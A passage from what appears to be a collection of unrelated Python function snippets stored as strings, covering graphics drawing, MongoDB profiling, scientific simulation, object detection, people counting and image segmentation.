second (0-0.9, 2-2.9, 4-4.9 etc)\n draw.pieslice(topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n else:\n draw.pieslice(topLeft + bottomRight, start=270+angle, end=270+360, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((113, 28+poy))\n bottomRight = scaler.xy((147, 62+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n \n # draw outer for segments\n if segments:\n topLeft = scaler.xy((115-0.25, 30+poy-0.25))\n bottomRight = scaler.xy((145+0.25, 60+poy+0.25))\n draw.ellipse(topLeft + bottomRight, fill=WHITE, outline=None)\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n draw.ellipse(topLeft + bottomRight, fill=BLACK, outline=None)\n\n # draw progress pie\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n angle = 360.0*frameNum/numFrames\n precise_filled_pieslice(draw, topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n\n # draw segments over the pieslice\n if segments:\n for i in range(0, len(segments)):\n angle = math.radians(270 + 360.0*segments[i][\"startSecs\"]/numFrames*FPS)\n centre = scaler.xy((130,45+poy))\n armEnd = scaler.xy((130 + 15*math.cos(angle), 45+poy + 15*math.sin(angle)))\n draw.line([centre, armEnd], fill=WHITE, width=int(scaler.s(0.25)))\n \n segStartFrame = segments[i][\"startSecs\"] * FPS\n nextStartFrame = segments[(i+1) % len(segments)][\"startSecs\"] * FPS\n if nextStartFrame <= segStartFrame:\n nextStartFrame += numFrames\n midAngle = math.radians(270 + 360.0* (segStartFrame+nextStartFrame)/2/numFrames)\n w,h = font.getsize(segments[i][\"label\"])\n centre = scaler.xy((130 + 15*math.cos(midAngle)*0.7, 45+poy + 15*math.sin(midAngle)*0.7))\n topLeft = centre[0] - w/2, centre[1] - h/2\n draw.text(topLeft, segments[i][\"label\"], fill=WHITE, font=font)\n\n # draw segment long labels\n topLeft = scaler.xy((10,61))\n draw.multiline_text(topLeft, segment_description_text, fill=WHITE, font=smallfont)\n \n # draw pulse train at the bottom\n LIM=FPS\n NUM_BLOBS = 2*LIM + 1\n blobSpacing = 150.0/NUM_BLOBS\n\n for offset in range(-LIM, +LIM+1):\n left = 80+blobSpacing*(offset-0.5)\n right = 80+blobSpacing*(offset+0.5)\n\n topLeft = scaler.xy(( left, 80 ))\n bottomRight = scaler.xy(( right, 85 ))\n\n seqIndex = offset + frameNum\n if seqIndex >= 0 and seqIndex < numFrames:\n colour = flashColsPipTrain[seqIndex]\n draw.rectangle(topLeft + bottomRight, outline=None, fill = colour)\n\n if offset == 0:\n # draw blob above\n topLeft = scaler.xy(( left, 75 ))\n bottomRight = scaler.xy(( right, 80 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # and below\n topLeft = scaler.xy(( left, 85 ))\n bottomRight = scaler.xy(( right, 90 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # shrink the image using high quality downsampling\n try:\n scalingMode = Image.LANCZOS\n except AttributeError:\n scalingMode = Image.BICUBIC\n\n rescaledImage = img.resize((widthPixels,heightPixels), scalingMode)\n\n yield rescaledImage", "def pruneBaselines(self, aru_prediction, size=()):\n if self.prune_method == 'simple':\n bl = aru_prediction[0,:,:,0] \n other = aru_prediction[0,:,:,2] \n # binarization\n b = 0.4\n # take both classes into account\n out = np.where(np.logical_and(bl > b, other < b), 1.0, 0)\n # remove some holes and single items\n # important step, otherwise the skeleton will have many small\n # branches\n # TODO: exchange w. opencv counterpart (faster)\n selem = np.ones((1,3))\n out = np.where(binary_closing(out,selem=selem),1.0,0.0)\n out = np.where(binary_opening(out,selem=selem),1.0,0.0)\n# misc.imsave(os.path.join(self.outdir,'tmp.png'), out)\n\n # enlarge output again\n # out = misc.imresize(out, size, interp='nearest') \n # deprecated, use:\n out = np.array(Image.fromarray(out).resize(size,\n resample=Image.NEAREST))\n # TODO: replace w. opencv cv2.resize\n\n # now let's get only single pixel lines\n# misc.imsave(os.path.join(self.outdir,'tmp2.png'), out)\n out = skeletonize(out) \n else:\n print('not implemented yet')\n\n return out", "def watch_profile(self):\r\n profile_parser = ProfileParser()\r\n databases = self._get_requested_databases()\r\n connection = pymongo.MongoClient(self._db_uri,\r\n document_class=OrderedDict,\r\n read_preference=pymongo.ReadPreference.PRIMARY_PREFERRED)\r\n enabled_profile = False\r\n\r\n if databases == []:\r\n try:\r\n databases = connection.database_names()\r\n except:\r\n message = \"Error: Could not list databases on server. Please \" \\\r\n + \"check the auth components of your URI.\\n\"\r\n sys.stderr.write(message)\r\n databases = []\r\n\r\n for ignore_db in IGNORE_DBS:\r\n if ignore_db in databases:\r\n databases.remove(ignore_db)\r\n\r\n if len(databases) != 1:\r\n message = \"Error: Please use namespaces (-n) to specify a single \" \\\r\n + \"database for profile watching.\\n\"\r\n sys.stderr.write(message)\r\n return 1\r\n\r\n database = databases[0]\r\n db = connection[database]\r\n\r\n initial_profile_level = db.profiling_level()\r\n\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Profile level currently 0. Dex is setting profile \" \\\r\n + \"level 1. To run --watch at profile level 2, \" \\\r\n + \"enable profile level 2 before running Dex.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(DEFAULT_PROFILE_LEVEL)\r\n\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n for profile_entry in self._tail_profile(db, WATCH_INTERVAL_SECONDS):\r\n self._process_query(profile_entry,\r\n profile_parser)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Dex is resetting profile level to initial value \" \\\r\n + \"of 0. You may wish to drop the system.profile \" \\\r\n + \"collection.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(initial_profile_level)\r\n\r\n return 0", "def _verify_profile(self, account_id: str, profile_id: str) -> str:\n profile = self.__ingest_profile\n if profile_id and self.__ip.ProfileExists(account_id=account_id, profile_id=profile_id):\n profile = profile_id\n elif self.__ingest_profile=='':\n response = self.__ip.GetDefaultProfile(account_id=account_id)\n if response.status_code in DynamicIngest.success_responses:\n profile = response.json().get('default_profile_id')\n return profile", "def __add__(self, other):\n if type(other) is not type(self):\n raise TypeError('`{}` and `{}` are not of the same profiler type.'.\n format(type(self).__name__, type(other).__name__))\n elif self.name != other.name:\n raise ValueError('Structured profile names are unmatched: {} != {}'\n .format(self.name, other.name))\n elif set(self.profiles) != set(other.profiles): # options check\n raise ValueError('Structured profilers were not setup with the same'\n ' options, hence they do not calculate the same '\n 'profiles and cannot be added together.')\n merged_profile = StructuredColProfiler(\n df_series=pd.Series([]),\n min_sample_size=max(self._min_sample_size, other._min_sample_size),\n sampling_ratio=max(self._sampling_ratio, other._sampling_ratio),\n min_true_samples=max(self._min_true_samples,\n other._min_true_samples),\n options=self.options,\n )\n\n merged_profile.name = self.name\n merged_profile._update_base_stats(\n {\"sample\": self.sample,\n \"sample_size\": self.sample_size,\n \"null_count\": self.null_count,\n \"null_types\": copy.deepcopy(self.null_types_index),\n \"min_id\": self._min_id,\n \"max_id\": self._max_id}\n )\n merged_profile._update_base_stats(\n {\"sample\": other.sample,\n \"sample_size\": other.sample_size,\n \"null_count\": other.null_count,\n \"null_types\": copy.deepcopy(other.null_types_index),\n \"min_id\": other._min_id,\n \"max_id\": other._max_id}\n )\n samples = list(dict.fromkeys(self.sample + other.sample))\n merged_profile.sample = random.sample(samples, min(len(samples), 5))\n for profile_name in self.profiles:\n merged_profile.profiles[profile_name] = (\n self.profiles[profile_name] + other.profiles[profile_name]\n )\n return merged_profile", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def demo(net, image_name,num_class,save_ff):\r\n\r\n # Load the demo image\r\n #im_file = os.path.join(cfg.DATA_DIR, 'demo', image_name)\r\n im_file=image_name\r\n im = cv2.imread(im_file)\r\n\r\n # Detect all object classes and regress object bounds\r\n timer = Timer()\r\n timer.tic()\r\n #for zzz in range(100):\r\n scores, boxes = im_detect(net, im)\r\n timer.toc()\r\n print ('Detection took {:.3f}s for '\r\n '{:d} object proposals').format(timer.total_time, boxes.shape[0])\r\n\r\n # Visualize detections for each class\r\n CONF_THRESH = 0.35\r\n NMS_THRESH = 0.3\r\n thresh=CONF_THRESH\r\n for cls_ind, cls in enumerate(range(num_class)):#CLASSES[1:]\r\n cls_ind += 1 # because we skipped background\r\n # cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]\r\n # cls_scores = scores[:, cls_ind]\r\n # dets = np.hstack((cls_boxes,\r\n # cls_scores[:, np.newaxis])).astype(np.float32)\r\n inds = np.where(scores[:, cls_ind] > thresh)[0]\r\n cls_scores = scores[inds, cls_ind]\r\n if cfg.TEST.AGNOSTIC:\r\n cls_boxes = boxes[inds, 4:8]\r\n else:\r\n cls_boxes = boxes[inds, cls_ind*4:(cls_ind+1)*4]\r\n dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])) \\\r\n .astype(np.float32, copy=False)\r\n keep = nms(dets, NMS_THRESH)\r\n dets = dets[keep, :]\r\n #vis_detections(im, cls, dets, thresh=CONF_THRESH)\r\n inds = np.where(dets[:, -1] >= thresh)[0]\r\n if len(inds) == 0:\r\n continue\r\n\r\n im_tmp = im#im[:, :, (2, 1, 0)]\r\n for i in inds:\r\n bbox = dets[i, :4]\r\n score = dets[i, -1]\r\n print bbox,score,cls\r\n cv2.rectangle(im_tmp, (bbox[0],bbox[1]), (bbox[2],bbox[3]), (0,0,255),2)\r\n #save_ff=\"/storage2/liushuai/faster_rcnn/FasterRCNN-Encapsulation-Cplusplus/faster_cxx_lib_ev2641/test_result.jpg\"\r\n im_tmp = im#im[:, :, (2, 1, 0)]\r\n cv2.imwrite(save_ff,im_tmp)\r\n #save_pic(im, cls, dets, thresh=CONF_THRESH,save_ff)\r", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def drawing_hit(self, shell, target):\n self.detonation = [(target.x - 3, target.y)]\n for i in range(7):\n self.x = target.x + 2 * i * target.r / 8 - target.r\n self.y = target.y - 2 * target.r\n self.xx = target.x - 3 + i\n self.yy = target.y\n self.detonation.extend(((self.x, self.y), (self.xx, self.yy)))\n\n self.canvas.create_polygon(self.detonation, outline=target.color, tag='text')\n\n self.canvas.create_arc(target.x - 1.5 * target.r, target.y - 2.5 * target.r,\n target.x, target.y + target.r / 3,\n start=160, extent=-80, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n self.canvas.create_arc(target.x - target.r, target.y - 3 * target.r,\n target.x + target.r, target.y,\n start=140, extent=-100, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n self.canvas.create_arc(target.x, target.y - 2.5 * target.r,\n target.x + 1.3 * target.r, target.y + target.r / 3,\n start=100, extent=-80, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n\n if shell.flag_hit == True:\n self.canvas.delete(shell.avatar)\n else:\n self.canvas.delete(\"bum\")\n self.canvas.delete(target.avatar)", "def visualize(self):\n colors = {'outline': (220, 220, 220),\n 'inlier': (0, 255, 0),\n 'outlier': (0, 0, 255),\n 'lines': (128, 220, 128)}\n # Create output image for visualization\n gap = 5\n h1, w1 = self.target.image.shape[:2]\n h2, w2 = self.image.shape[:2]\n vis = np.zeros((max(h1, h2), w1 + w2 + gap, 3), np.uint8)\n vis[:h1, :w1, :] = self.target.image\n w1 += gap\n vis[:h2, w1:w1+w2, :] = self.image\n \n # Draw the located object \n quad = np.float32(self.quad) + np.float32([w1, 0])\n self.draw(vis, colors['outline'], 2, quad)\n \n # draw point details\n inliers = [(x0, y0, x1 + w1, y1) for (x0, y0), (x1, y1) in self.inliers]\n outliers = [(x0, y0, x1 + w1, y1) for (x0, y0), (x1, y1) in self.outliers]\n if colors['outlier'] is not None: # draw x on each point\n r = 2 # radius\n thickness = 2\n for x0, y0, x1, y1 in outliers:\n cv2.line(vis, (x0 - r, y0 - r), (x0 + r, y0 + r), colors['outlier'], thickness)\n cv2.line(vis, (x0 + r, y0 - r), (x0 - r, y0 + r), colors['outlier'], thickness)\n cv2.line(vis, (x1 - r, y1 - r), (x1 + r, y1 + r), colors['outlier'], thickness)\n cv2.line(vis, (x1 + r, y1 - r), (x1 - r, y1 + r), colors['outlier'], thickness)\n if colors['lines'] is not None:\n for x0, y0, x1, y1 in inliers:\n cv2.line(vis, (x0, y0), (x1, y1), colors['lines'], 1)\n if colors['inlier'] is not None:\n for x0, y0, x1, y1 in inliers:\n cv2.circle(vis, (x0, y0), 2, colors['inlier'], -1)\n cv2.circle(vis, (x1, y1), 2, colors['inlier'], -1)\n return vis", "def track_object(self, frame_stamp, boxes, image, threshold=0, debug=False):\n people_in = self.DB.in_count()\n people_out = self.DB.out_count()\n\n objects = self.ct.update(boxes)\n if len(objects) > self.old_len:\n self.people = len(objects)\n\n # people_currently_in = self.DB.in_current()\n\n # loop over the tracked objects\n for (objectID, centroid) in objects.items():\n # check to see if a trackable object exists for the current\n # object ID\n to = self.trackableObjects.get(objectID, None)\n # if there is no existing trackable object, create one\n if to is None:\n to = TrackableObject(objectID, centroid)\n # otherwise, there is a trackable object so we can utilize it\n # to determine direction\n else:\n # check to see if the object has been counted or\n # if there is a change in its direction\n if not to.counted:\n to.counted = True\n if centroid[1] > threshold:\n to.start_point = \"down\"\n else:\n to.start_point = \"up\"\n\n print(f\"total people: {people_in-people_out}\")\n # the difference between the y-coordinate\n # of the current centroid & the mean\n # of previous centroids will tell us in\n # which direction the object is moving\n # (negative for 'up' & positive for 'down')\n y = [c[1] for c in to.centroids]\n direction = centroid[1] - np.mean(y)\n to.centroids.append(centroid)\n\n # Define the direction towards that the person\n # is walking to & update it on the obj instance\n if direction > 0 and centroid[1] > threshold:\n to.direction = \"in\"\n elif direction < 0 and centroid[1] < threshold:\n to.direction = \"out\"\n\n # If the new direction of the object is\n # different to its previous direction\n # update the people counter\n if to.direction != to.prev_direction:\n # A person has just walked in\n if to.direction == \"in\" and to.start_point != \"down\":\n people_in += 1\n to.prev_direction = \"in\"\n to.start_point = \"up\"\n # A person has just walked out\n elif to.direction == \"out\" and to.start_point != \"up\":\n to.prev_direction = \"out\"\n people_out += 1\n to.start_point = \"down\"\n\n # store the trackable object in our dictionary\n self.trackableObjects[objectID] = to\n\n # draw both the ID of the object and the centroid of the\n # object on the output frame\n # draw both the ID of the object and the centroid of the\n # object on the output frame\n if debug:\n text = \"ID {}\".format(objectID)\n cv2.putText(\n image,\n text,\n (centroid[0] - 10, centroid[1] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5,\n (0, 255, 0),\n 2,\n )\n cv2.circle(image, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n if people_out > people_in:\n people_out = people_in\n # update database information about total number\n # of people that entered/left the given space\n self.DB.update_out(people_out)\n self.DB.update_in(people_in)", "def GC_Profile_check(d0=datetime(2005,1,1),d1=datetime(2005,1,31), title=None):\n LatWol, LonWol = pp.__cities__['Wol']\n # Read GC output \n trop = GC_class.GC_sat(d0,d1, keys=['IJ-AVG-$_CH2O']+GC_class.__gc_tropcolumn_keys__)\n tropa= GC_class.GC_sat(d0,d1, keys=['IJ-AVG-$_CH2O']+GC_class.__gc_tropcolumn_keys__, run='new_emissions')\n # make sure pedges and pmids are created\n trop.add_pedges()\n dates=trop.dates\n \n # colours for trop and tropa\n c = 'r'\n ca= 'm'\n \n # grab wollongong square\n Woli, Wolj = util.lat_lon_index(LatWol,LonWol,trop.lats,trop.lons) # lat, lon indices\n GC_VMR = trop.hcho[:,Woli,Wolj,:]\n GCa_VMR = tropa.hcho[:,Woli,Wolj,:]\n \n GC_zmids=trop.zmids[:,Woli,Wolj,:]\n \n # check profile\n # TODO: split into summer and winter\n plt.figure(figsize=[10,10])\n #ax0=plt.subplot(1,2,1)\n for i,prof in enumerate([GC_VMR,GCa_VMR]):\n zmids = np.nanmean(GC_zmids,axis=0)/1000.0\n #pmids = np.nanmean(GC_pmids[0:20,:],axis=0)\n \n mean = np.nanmean(prof,axis=0)\n lq = np.nanpercentile(prof, 25, axis=0)\n uq = np.nanpercentile(prof, 75, axis=0)\n plt.fill_betweenx(zmids, lq, uq, alpha=0.5, color=[c,ca][i])\n plt.plot(mean,zmids,label=['VMR','VMR$^{\\\\alpha}$'][i],linewidth=2,color=[c,ca][i])\n #plt.yscale('log')\n plt.ylim([0, 40])\n plt.ylabel('altitude [km]')\n plt.legend(fontsize=20)\n plt.xlabel('HCHO [ppbv]')\n if title is None:\n title=\"Wollongong midday HCHO profile Jan 2005\"\n plt.title(title)\n pname_checkprof='Figs/check_GC_profile.png'\n plt.savefig(pname_checkprof)\n print(\"Saved \", pname_checkprof)", "def segmentation(\n img,\n img_path,\n results_folder,\n callback_context,\n crf_theta_slider_value,\n crf_mu_slider_value,\n rf_downsample_value,\n crf_downsample_factor,\n gt_prob,\n mask,#=None,\n n_sigmas,\n multichannel,#=True,\n intensity,#=True,\n edges,#=True,\n texture,#=True,\n sigma_min,#=0.5,\n sigma_max,#=16,\n):\n\n # #standardization using adjusted standard deviation\n img = standardize(img)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image standardized')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n for ni in np.unique(mask[1:]):\n logging.info('examples provided of %i' % (ni))\n\n if len(np.unique(mask)[1:])==1:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Only one class annotation provided, skipping RF and CRF and coding all pixels %i' % (np.unique(mask)[1:]))\n result2 = np.ones(mask.shape[:2])*np.unique(mask)[1:]\n result2 = result2.astype(np.uint8)\n\n else:\n\n result = do_classify(img,mask,n_sigmas,multichannel,intensity,edges,texture, sigma_min,sigma_max, rf_downsample_value)#,SAVE_RF) # n_estimators,rf_file,data_file,\n\n Worig = img.shape[0]\n result = filter_one_hot(result, 2*Worig)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels filtered')\n\n if Worig>512:\n result = filter_one_hot_spatial(result, 2)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels spatially filtered')\n else:\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels not spatially filtered because width < 512 pixels')\n\n result = result.astype('float')\n result[result==0] = np.nan\n result = inpaint_nans(result).astype('uint8')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Spatially filtered values inpainted')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('RF model applied with sigma range %f : %f' % (sigma_min,sigma_max))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n def tta_crf_int(img, result, k):\n k = int(k)\n result2, n = crf_refine(np.roll(result,k), np.roll(img,k), crf_theta_slider_value, crf_mu_slider_value, crf_downsample_factor, gt_prob)\n result2 = np.roll(result2, -k)\n if k==0:\n w=.1\n else:\n w = 1/np.sqrt(k)\n\n return result2, w,n\n\n num_tta = 5#10\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF parallel test-time augmentation')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n w = Parallel(n_jobs=-2, verbose=0)(delayed(tta_crf_int)(img, result, k) for k in np.linspace(0,int(img.shape[0])/5,num_tta))\n R,W,n = zip(*w)\n else:\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF serial test-time augmentation')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n R = []; W = []; n = []\n for k in np.linspace(0,int(img.shape[0])/5,num_tta):\n r,w,nn = tta_crf_int(img, result, k)\n R.append(r); W.append(w); n.append(nn)\n\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF model applied with %i test-time augmentations' % ( num_tta))\n\n result2 = np.round(np.average(np.dstack(R), axis=-1, weights = W)).astype('uint8')\n del R,W\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Weighted average applied to test-time augmented outputs')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF model applied with theta=%f and mu=%f' % ( crf_theta_slider_value, crf_mu_slider_value))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n if ((n==1)):\n result2[result>0] = np.unique(result)\n\n result2 = result2.astype('float')\n result2[result2==0] = np.nan\n result2 = inpaint_nans(result2).astype('uint8')\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Spatially filtered values inpainted')\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return result2", "def breath_analyze(self, offset=0, th=10):\n # breath part\n breath_gd = np.gradient(gf(self.breath_list, 10))\n breath_gd[breath_gd > 0] = 1\n breath_gd[breath_gd < 0] = 0\n breath_pulse = breath_gd[:-1]-np.roll(breath_gd, -1)[:-1]\n breath_in = argrelextrema(breath_pulse, np.less, order=10)[0]#+offset\n breath_out = argrelextrema(breath_pulse, np.greater, order=10)[0]#+offset\n self.breath = np.sort(np.hstack([breath_in, breath_out, len(self.breath_list)-1]))\n \n if self.breath[0] == breath_in[0]:\n self.btype = 'in'\n else:\n self.btype = 'out' \n\n b_in = []\n b_out = []\n delidx = []\n\n if len(self.breath) != 0: \n for i, j in zip(self.breath[:-1], self.breath[1:]):\n breath_diff = abs(self.breath_list[j]-self.breath_list[i])\n if abs(breath_diff) > 3000: # really breath in/out\n if abs(breath_diff) < 30000: # not deep breath\n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_out.append(j-i)\n self.ngframe.append(i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_in.append(j-i)\n else: \n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j))\n b_out.append(j-i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j))\n b_in.append(j-i)\n else:\n delidx.append(np.argwhere(self.breath==j)[0][0])\n self.breath = np.delete(self.breath, np.array(delidx))\n\n print('\\naverage breath out freq is: '+str(np.round(30./np.mean(b_out), 2))+' Hz')\n print('\\naverage breath in freq is: '+str(np.round(30./np.mean(b_in), 2))+' Hz')\n else:\n raise ImportError('Doing too fast !! please redo again !!')", "def skin_detection(img):\n for index_line, line in enumerate(img):\n for index_pixel, pixel in enumerate(line):\n if pixel[2] > 95 and pixel[1] > 40 and pixel[0] > 20 and max(pixel) - min(pixel) > 15 \\\n and abs(pixel[2] - pixel[1]) > 15 and pixel[2] > pixel[0] and pixel[2] > pixel[1] \\\n and index_pixel > len(line) / 2:\n # img[index_line][index_pixel] = (255, 255, 255)\n pass\n else:\n img[index_line][index_pixel] = (0, 0, 0)\n return img", "def magic_profile(self, parameter_s=''):\n if self.rc.profile:\n printpl('Current IPython profile: $self.rc.profile.')\n else:\n print 'No profile active.'", "def draw(self, prev_draw):\n # Std deviations for each parameter, the mean is the current location\n # strike = .375\n # length = 4.e3\n # width = 3.e3\n # depth = .1875\n # slip = .01\n # rake = .25\n # dip = .0875\n # longitude = .025\n # latitude = .01875\n strike_std = 5. # strike_std = 1.\n length_std = 5.e3 # length_std = 2.e4\n width_std = 2.e3 # width_std = 1.e4\n depth_std = 1.e3 # depth_std = 2.e3\n slip_std = 0.5 # slip_std = 0.5\n rake_std = 0.5 # rake_std = 0.5\n dip_std = 0.1 # dip_std = 0.1\n longitude_std = 0.15 # longitude_std = .025\n latitude_std = 0.15 # latitude_std = .025\n mean = np.zeros(9)\n # square for std => cov\n cov = np.diag(np.square([strike_std, length_std, width_std, depth_std, slip_std, rake_std,\n dip_std, longitude_std, latitude_std]))\n\n cov *= 0.25;\n\n # random draw from normal distribution\n e = stats.multivariate_normal(mean, cov).rvs()\n\n # does sample update normally\n print(\"Random walk difference:\", e)\n print(\"New draw:\", prev_draw + e)\n new_draw = prev_draw + e\n\n \"\"\"\n Here we make some fixed changes to the dip and depth according \n to a simple rule documented elsewhere. This fix will likely\n depreciate upon finishing proof of concept paper and work on 1852\n event.\n \"\"\"\n # doctor dip to 20 degrees as discussed\n new_draw[6] = 20\n # doctor depth according to adhoc fix\n new_draw[3] = self.doctored_depth_1852_adhoc(new_draw[7], new_draw[8], new_draw[6])\n\n # return appropriately doctored draw\n return new_draw", "def flagUntexturedObject(self, object):\n object.setShaderInput(\"texDisable\", 1, 1, 1, 1)", "def apply_decal_if_inside_border(picture, decal, point, polygon, h_inv, limit):\n if is_inside(point, polygon):\n decal_point = find_decal_point(h_inv, point, limit)\n picture.putpixel(point, decal.getpixel(decal_point))", "def _atexit_print_fn():\r\n to_sum = []\r\n for ps in _atexit_print_list:\r\n if ps.fct_callcount or ps.compile_time > 0:\r\n ps.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)\r\n if not isinstance(ps, ScanProfileStats):\r\n to_sum.append(ps)\r\n else:\r\n #TODO print the name if there is one!\r\n print 'Skipping empty Profile'\r\n if len(to_sum) > 1:\r\n # Make a global profile\r\n cum = copy.copy(to_sum[0])\r\n cum.message = \"Sum of all printed profiles at exit excluding Scan op profile.\"\r\n for ps in to_sum[1:]:\r\n for attr in [\"compile_time\", \"fct_call_time\", \"fct_callcount\",\r\n \"vm_call_time\", \"optimizer_time\", \"linker_time\",\r\n \"validate_time\"]:\r\n setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\r\n\r\n #merge dictonary\r\n for attr in [\"apply_time\", \"apply_callcount\",\r\n \"apply_cimpl\", \"variable_shape\", \"variable_strides\"]:\r\n cum_attr = getattr(cum, attr)\r\n for key, val in getattr(ps, attr).iteritems():\r\n assert key not in cum_attr\r\n cum_attr[key] = val\r\n\r\n if cum.optimizer_profile and ps.optimizer_profile:\r\n merge = cum.optimizer_profile[0].merge_profile(\r\n cum.optimizer_profile[1],\r\n ps.optimizer_profile[1])\r\n cum.optimizer_profile = (cum.optimizer_profile[0], merge)\r\n else:\r\n cum.optimizer_profile = None\r\n\r\n cum.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def draw_mask(img, 